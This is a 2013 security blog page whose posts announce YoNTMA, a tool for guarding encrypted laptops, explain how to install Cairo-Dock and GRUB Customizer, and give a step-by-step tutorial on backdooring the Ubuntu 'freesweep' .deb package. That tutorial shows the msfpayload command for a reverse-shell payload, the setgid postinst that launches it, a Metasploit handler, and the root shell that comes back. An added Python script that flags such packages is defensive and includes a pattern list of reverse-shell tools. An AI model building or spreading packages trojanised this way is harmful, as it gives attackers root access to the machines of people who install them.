Wednesday, 19 June 2013

YoNTMA - A tool to protect your encrypted data




You're a responsible defender of your data. You keep all of your disks encrypted. You hibernate your laptop when you're not using it to keep any sensitive data out of RAM. You're known by friends, family, and colleagues as a tireless crusader against data theft. But do you hibernate your laptop when you visit a co-worker's office for a few minutes? What about when you get up to use the bathroom? What happens if a thief snatches your laptop while it's locked, but still powered on? The encryption keys are still in memory, which makes them vulnerable to DMA or cold boot attacks. Once the thief has the data encryption keys, they effectively have physical access to an unencrypted laptop, which means game over for your data.

Enter YoNTMA! YoNTMA (You'll Never Take Me Alive!) is a tool designed to enhance the protection of encrypted data. YoNTMA runs as a background service and begins monitoring your computer any time the screen is locked. If the power cable or Ethernet cable is disconnected from the system while your laptop is locked, YoNTMA will immediately hibernate the machine to ensure that the disk encryption keys do not remain in RAM. This ensures that if a thief walks off with your powered-on laptop, your encrypted data stays protected. (Hibernation writes the contents of RAM to disk, so this only helps when the hibernation file or swap partition itself lives on the encrypted volume; otherwise the keys end up on disk in the clear.)

iSEC Partners is pleased to announce the first public release of YoNTMA. The project is hosted on GitHub at the following URL 

Try it out and let us know what features you'd like to see or any other feedback you have on the Issues page.

Thursday, 30 May 2013

Binary Linux Trojan


Binary trojans are not exclusive to the Windows world. Here we package a Metasploit payload into an Ubuntu .deb package to get a shell on Linux. An excellent video by Redmeat_uk demonstrates this technique: http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Minesweeper.

root@kali:~# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~# mkdir /tmp/evil
root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil#


Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".

root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@kali:/tmp/evil# mkdir work/DEBIAN


In the 'DEBIAN' directory, create a file named 'control' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# nano control

Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com>
Description: a text-based minesweeper

We also need a post-installation script that launches our binary. In the 'DEBIAN' directory, create a file named 'postinst' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# cat postinst

#!/bin/sh
# dpkg runs this as root during installation, so the sudo is redundant. The chmod makes
# the payload executable (and setgid), it is started in the background, then the real game runs.
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

Now we'll create our malicious payload: a staged reverse shell that connects back to us, written straight into the extracted package tree as 'freesweep_scores' (the path the postinst above expects).

root@kali:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.105,LPORT=443


We'll now make our post-installation script executable and build our new package. dpkg-deb writes the result next to the work directory as 'work.deb', so we rename it to 'freesweep.deb' and copy it to our web root directory.

root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@kali:/tmp/evil/work/DEBIAN# cd /tmp/evil
root@kali:/tmp/evil# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@kali:/tmp/evil# mv work.deb freesweep.deb
root@kali:/tmp/evil# cp freesweep.deb /var/www/

If it is not already running, we'll need to start the Apache web server.
root@kali:/tmp/evil# service apache2 start


We will need to set up the Metasploit multi/handler to receive the incoming connection.

root@kali:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

ubuntu@ubuntu:~$ wget http://192.168.1.105/freesweep.deb

ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb


As soon as the victim installs the package, dpkg runs our postinst (as root, which is how maintainer scripts always execute) and we receive a shell:

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.105:443 -> 192.168.1.175:1129)

ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...

hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)
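Seen from the defender's side, everything that makes this package work also makes it easy to spot before it reaches dpkg -i: the payload is started from a maintainer script that sets the setgid bit and backgrounds processes, the script calls sudo even though dpkg already runs it as root, and a hand-built package like this carries no md5sums for the files it installs. The Python script below is an added example, not code from the original tutorial or from Metasploit; it parses the .deb container (an ar archive holding control.tar.* and data.tar.*) with only the standard library and reports those tells. The freesweep.deb it inspects is assembled in memory from the control file and postinst shown above, with dummy bytes standing in for the two binaries; that sample package and the pattern list are constructed for this example.

```python
# Added example (not from the page or from Metasploit): parse a .deb offline and
# flag the tells of a trojanised maintainer script like the postinst above.
import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINT_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# (pattern, reason) pairs checked against every non-comment line of each script
SUSPICIOUS = (
    (re.compile(r"\bchmod\s+(?:[0-7]*[2-7][0-7]{3}|[ugoa]*\+[rwx]*s)"), "sets setuid/setgid bit"),
    (re.compile(r"(?<![&|>])&(?![&>])"), "backgrounds a process with a lone '&'"),
    (re.compile(r"\bsudo\b"), "calls sudo although dpkg already runs maintainer scripts as root"),
    (re.compile(r"\b(?:nc|ncat|netcat|wget|curl)\b|\bbash\s+-i\b|/dev/tcp/"), "network or reverse-shell tooling"),
)


def ar_members(blob):
    """Yield (name, payload) for each member of the ar archive that wraps a .deb."""
    if blob[:8] != AR_MAGIC:
        raise ValueError("not an ar archive")
    off = 8
    while off + 60 <= len(blob):
        hdr = blob[off:off + 60]
        name = hdr[:16].decode().rstrip().rstrip("/")  # GNU ar writes "name/" space-padded
        size = int(hdr[48:58].decode())
        yield name, blob[off + 60:off + 60 + size]
        off += 60 + size + (size & 1)                   # members start on even offsets


def tar_files(payload):
    """Return {path: bytes} for the regular files in a (possibly compressed) tarball."""
    files = {}
    with tarfile.open(fileobj=io.BytesIO(payload), mode="r:*") as tf:
        for m in tf.getmembers():
            if m.isfile():
                files[m.name.lstrip("./")] = tf.extractfile(m).read()
    return files


def inspect_deb(blob):
    """Return a list of human-readable findings for one .deb image."""
    members = dict(ar_members(blob))
    control = tar_files(members[next(n for n in members if n.startswith("control.tar"))])
    data = tar_files(members[next(n for n in members if n.startswith("data.tar"))])
    findings = []
    for script in MAINT_SCRIPTS:
        lines = control.get(script, b"").decode(errors="replace").splitlines()
        for lineno, line in enumerate(lines, 1):
            if line.lstrip().startswith("#"):
                continue
            for pattern, reason in SUSPICIOUS:
                if pattern.search(line):
                    findings.append(f"{script}:{lineno}: {reason}: {line.strip()}")
    # debsums / dpkg -V depend on md5sums; a hand-built package usually ships none
    listed = set()
    for entry in control.get("md5sums", b"").decode().splitlines():
        parts = entry.split(None, 1)
        if len(parts) == 2:
            listed.add(parts[1].strip())
    for path in sorted(data):
        if path not in listed:
            findings.append(f"{path}: shipped in data.tar but absent from md5sums")
    return findings


# --- constructed sample: control and postinst as on the page, dummy bytes for the binaries ---
CONTROL = b"""Package: freesweep
Version: 0.90-1
Section: games
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com>
Description: a text-based minesweeper
"""
POSTINST = (b"#!/bin/sh\nsudo chmod 2755 /usr/games/freesweep_scores && "
            b"/usr/games/freesweep_scores & /usr/games/freesweep &\n")


def _ar_member(name, payload):
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{100644:<8}{len(payload):<10}`\n".encode()
    return hdr + payload + (b"\n" if len(payload) % 2 else b"")


def _tgz(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, content in files.items():
            info = tarfile.TarInfo("./" + path)
            info.size, info.mode = len(content), 0o755
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_deb(postinst=POSTINST):
    """Assemble a minimal freesweep.deb in memory (hypothetical stand-in for the page's file)."""
    data = {"usr/games/freesweep": b"\x7fELF dummy", "usr/games/freesweep_scores": b"\x7fELF dummy"}
    return (AR_MAGIC + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", _tgz({"control": CONTROL, "postinst": postinst}))
            + _ar_member("data.tar.gz", _tgz(data)))


if __name__ == "__main__":
    for finding in inspect_deb(build_sample_deb()):
        print(finding)
```

Run it as-is to see the findings for the constructed package, or pass the bytes of any downloaded .deb to inspect_deb before installing it. The patterns are heuristics (a legitimate postinst may also background a daemon), so treat a finding as a reason to read the script, not as a verdict.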



How to install Dock in Kali Linux


Cairo-Dock is a pretty, fast and customizable desktop interface. You can see it as a good alternative or addition to Unity, Gnome-Shell, Xfce-panel, KDE-panel, etc. Cairo-Dock sits in the centre of your desktop, allowing you to monitor and control your favourite apps: music players, chat messengers, Twitter, torrent downloaders, RSS feeds, calendar/tasks, weather, mail checkers, etc., plus a powerful taskbar. Below is a short summary of the improvements and new features in version 3.1.

Cairo Dock includes many plugins/applets such as: weather, clock, Messaging Menu, system monitor, keyboard indicators, custom icons, notification area, clipboard manager, and many other plugins.

What's New in Cairo Dock?
Main Changes:

  • Better integration of Unity: support of the Launcher API and better support of indicators

  • All configuration windows have been merged into a single one.

  • Added progress bars in several applets and in the Dbus API

  • The Music Player applet can control players in the systray.

  • Icons of the taskbar can be separated from launchers or not

  • The advanced mode of the configuration panel has been improved (thanks to SQP!)

  • Messaging Menu has been rewritten for newer versions and two new 'indicator' applets have been added:

  • Printers-Menu: shows active print jobs.

  • Sync-Menu: e.g. on Ubuntu 12.10, it collects status information from processes that synchronise with servers, such as Ubuntu One.

  • various bug fixes and improvements


Core:

  • The dock now supports XRandR, which replaces Xinerama and helps the dock manage multiple monitors.

  • Progress bars can now be customised (in the advanced mode of the configuration panel / 'Indicators' module).

  • We can drop .sh files into the dock to quickly create a new launcher.

  • The "Lock icons position" option now only locks the icon positions; new launchers/files can still be added from the menu/file manager.

  • QuickList menu entries are now translated if a translation is available.

  • We can now launch the dock with the '-W' (--metacity-workaround) option, a workaround for window managers (e.g. Metacity) that do not handle opacity correctly (if your subdock/dock/dialogues are invisible).

  • Window actions have been merged into a single menu entry (right-click menu).

  • The default view now uses all the screen space to avoid the jitter of the dock when it is resized (visible only if your window manager doesn't resize it correctly).

  • Labels in a vertical dock now end with a gradient.

  • The dock now supports animated images with a variable rate (have a look at the new 'Busy' animation when the Weather applet is downloading data or when you're uploading files with the 'Drop to Share' applet).


Plug-ins:

  • Clock: We can now easily add a new task by doing a right click on the calendar.

  • Drop to Share: now supports text files (it uploads the content of text files to servers like pastebin).

  • Applications Menu: uses gio to launch the menu entries, so that the event is stored in Zeitgeist.

  • Mail: Improved the look of the icon and its dialogue.

  • MusicPlayer: No longer displays quicklists, since the applet already provides all the common actions for any player.

  • Notification Area: displays the title, the label and the description (if available) on the label of the icon.

  • PowerManager: displays the details of all batteries (not only the first one) and modifies the icon if a battery is removed/added.

  • QuickBrowser: Added drag support (e.g. to quickly drop a file into GMail in order to attach it to the mail).

  • Recent-Events: prevents double entries in the menu list and hides unavailable files.

  • Recent Events: added recent applications.

  • Shortcuts: added the possibility to launch nautilus-connect-server from its menu

  • Shortcuts: Moved the 'Home' directory to the bookmark list

  • Stack: it now supports all URI types, not only files from the file system but also files from servers or even from the trash.

  • Switcher: Added new options and modified the list of options. A very simple drawing is now possible (like the Switcher applet of the Gnome-Panel).

  • Added an option to have progress bars in a few applets (Sound Control, Wifi, PowerManager, etc.).


Other Changes:

  • A new 'third-party' applet is available: YoutubeDL to easily download Youtube videos (thanks to Brian).

  • Twitter applet now supports Identi.ca.

  • 3 new themes are available.

  • The code has been cleaned in order to remove most warnings when we compile it with -Wall (and -Wextra for the core).

  • Translations have been updated.


Installation with one copy-paste


If you don't want to read about the installation in detail, or just want a quick install of the dock, copy-paste the commands below into a terminal.
(The echo line is long and may wrap on the page, but it is a single command.)

  • sudo -v


Enter your password when prompted (it is not echoed).

  • echo "deb http://download.tuxfamily.org/glxdock/repository/ubuntu $(lsb_release -sc) cairo-dock" | sudo tee -a /etc/apt/sources.list



  • wget -q http://download.tuxfamily.org/glxdock/repository/cairo-dock.gpg -O- | sudo apt-key add -



  • sudo apt-get update



  • sudo apt-get install cairo-dock cairo-dock-plug-ins # or, if the dock is already installed => sudo apt-get dist-upgrade


Three things to check before pasting. The repository path is keyed by Ubuntu release codename, so on Kali '$(lsb_release -sc)' will not expand to a codename the server knows; put the codename of a supported Ubuntu release in its place. The signing key is fetched over plain HTTP and handed to apt-key, which makes it trusted for every package apt installs as root, so compare its fingerprint ('sudo apt-key finger') with one obtained out of band before running apt-get install. And 'tee -a' appends on every run, so do not run the echo line twice or the source will be listed twice.



Wednesday, 29 May 2013

How to install GRUB customizer in ubuntu 13.04


Grub Customizer is a graphical interface to configure the GRUB2/BURG settings and menu entries

Features:

  • move, remove or rename menu entries (they stay updatable by update-grub)

  • edit the contents of menuentries or create new ones (internally it edits the 40_custom)

  • support for GRUB2 and BURG

  • reinstallation of the bootloader to MBR

  • settings like default operating system, kernel params, background image and text colors etc.

  • changing the configuration of an installed operating system while running from a live CD


Install GRUB customizer in ubuntu 13.04

Open the terminal and run the following commands
sudo add-apt-repository ppa:danielrichter2007/grub-customizer
sudo apt-get update
sudo apt-get install grub-customizer